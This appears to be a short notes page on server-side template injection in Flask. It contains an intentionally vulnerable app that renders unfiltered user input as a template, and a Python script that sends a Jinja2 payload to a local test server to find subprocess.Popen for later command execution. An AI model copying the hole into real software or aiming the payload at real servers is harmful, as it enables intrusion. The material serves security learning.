SSTI
FLASK WEB APP :
index.py
from flask import *
app = Flask(__name__)
@app.route('/')
def index():
search = request.args.get('search') or None
template = '''
<p> SSTI KNOW </p>
{}
'''.format(search) # ==> No filter + User Query
print("[+] REQ : %s" % search)
return render_template_string(template) # ==> Vuln
PAYLOAD :
Dev by my self for find the good classes
import requests
import re
import html
url = "http://127.0.0.1:8080/?search="
ssti_leak = "{{''.__class__.__mro__[1].__subclasses__()}}"
r = requests.get(url + ssti_leak)
# Parse
unescaped_text = html.unescape(r.text)
class_names = re.findall(r"<class '(.*?)'>", unescaped_text)
# Find Subprocess
target_class = "subprocess.Popen"
index = None
for i, class_name in enumerate(class_names):
if class_name == target_class:
index = i
break
if index is not None:
print(f"[+] {target_class} at : {index}")
else:
print(f"No bg")
Last updated